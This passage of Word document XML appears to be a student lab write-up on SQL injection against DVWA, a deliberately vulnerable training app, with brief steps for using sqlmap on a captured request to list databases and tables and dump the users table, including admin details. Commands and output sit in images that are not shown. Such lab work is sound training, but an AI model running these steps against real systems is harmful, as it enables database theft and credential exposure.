    <w:p w14:paraId="743C71A5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4DE0CF76" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4483B9E8" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0C7FE388" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2148A19D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7A6CC944" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3A722F9D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="499961E4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1C4D4916" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5BF9A1FD" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="12C84E50" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="29712004" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="73E601D5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6B13D00E" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0DEA2A58" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6F3116CA" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5A6328EE" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="331A5E80" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6E32065B" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="52C80A66" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="45A8F994" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="63CF67D0" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5BF6CBD8" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0EC52003" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6512ED6A" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="61B1B8B5" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1B9B67E4" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3189825A" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4519E16C" w14:textId="77777777" w:rsidR="0062568D" w:rsidRDefault="0062568D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="59E1340D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4F876486" w14:textId="77777777" w:rsidR="0094794C" w:rsidRDefault="0094794C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2F96B150" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4DAFA0D8" w14:textId="0A4AB9E1" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:lastRenderedPageBreak/>
        <w:t>View the captured request using ‘cat’ command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA5070" w14:textId="6FC9A23C" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="00C004FE" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0912482E" wp14:editId="15FB5B94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5423627" cy="3721211"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="157264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46335" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5423627" cy="3721211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACCDF3" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7B65C761" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0A9EC7DB" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0865DA87" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="467D28D6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4A9471A2" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3BD8302A" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6FBC8CB4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2F6EC03D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="46D1BEE6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7795561E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3715B190" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="46609320" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4B51780A" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="60E6D9F5" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="45F4D3BF" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3CBDEFFE" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="437E9A22" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="78784821" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="37A489F6" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3B1C0C06" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRPr="000E6F01" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5649B41B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="648F64FF" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Extract databases using sqlmap for the ‘CapturedRequest.txt’ file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F77CC2" w14:textId="62C929E1" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="00C004FE">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="319DB397" wp14:editId="5A5883B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4997</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486637" cy="743054"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="98726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67213" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3486637" cy="743054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF1E4F" w14:textId="575B518F" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="00C004FE">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722EC0A6" w14:textId="5ED6D830" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="00C004FE">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472F54DC" w14:textId="2A890B44" w:rsidR="00C004FE" w:rsidRPr="000E6F01" w:rsidRDefault="00C004FE" w:rsidP="00C004FE">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0A0AB8" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AAF14DF" wp14:editId="19C07A2B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>288235</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2878372" cy="1261404"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="211787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75986" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2887095" cy="1265227"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Databases found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A2442" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="665DFC13" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3E9C47BC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0C78C12E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0F97B8F0" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4A9E7DA5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3D46EE18" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="53634DF1" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7EB5E319" w14:textId="77777777" w:rsidR="00C004FE" w:rsidRDefault="00C004FE" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6528EFAD" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5ADD61E0" w14:textId="77777777" w:rsidR="0094794C" w:rsidRDefault="0094794C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="307703C4" w14:textId="38B7D40A" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="081B7E38" wp14:editId="78B5E70B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>237986</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3514477" cy="803541"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37965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57996" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3514477" cy="803541"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="000E6F01">
        <w:t xml:space="preserve">Viewing the tables for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E6F01">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E6F01">
        <w:t xml:space="preserve"> database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D841A7" w14:textId="59915D5E" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="08B59447" w14:textId="77777777" w:rsidR="00F45D7C" w:rsidRDefault="00F45D7C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="38A78AE1" w14:textId="77777777" w:rsidR="00F45D7C" w:rsidRPr="000E6F01" w:rsidRDefault="00F45D7C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="635BA07F" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4D291981" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3CC43CE2" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Two tables found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F608DD5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F1AD01E" wp14:editId="02AEDA5B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-3285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1209844" cy="914528"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6403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4579" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1209844" cy="914528"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="462DF527" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6C22ABA9" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6462B929" w14:textId="77777777" w:rsidR="00F45D7C" w:rsidRDefault="00F45D7C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7F7F3215" w14:textId="77777777" w:rsidR="00F45D7C" w:rsidRPr="000E6F01" w:rsidRDefault="00F45D7C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="09207213" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3CC50A29" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Dump the user’s table information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2396C4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08FB852B" wp14:editId="34306744">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4648849" cy="857370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="181655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55597" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4648849" cy="857370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BCF2B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3BD4E82D" w14:textId="77777777" w:rsidR="00B44C18" w:rsidRDefault="00B44C18" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1CF4CEF0" w14:textId="77777777" w:rsidR="00B44C18" w:rsidRPr="000E6F01" w:rsidRDefault="00B44C18" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6B278919" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="66C3742C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="734CB1FE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Found the admin details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605560B2" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
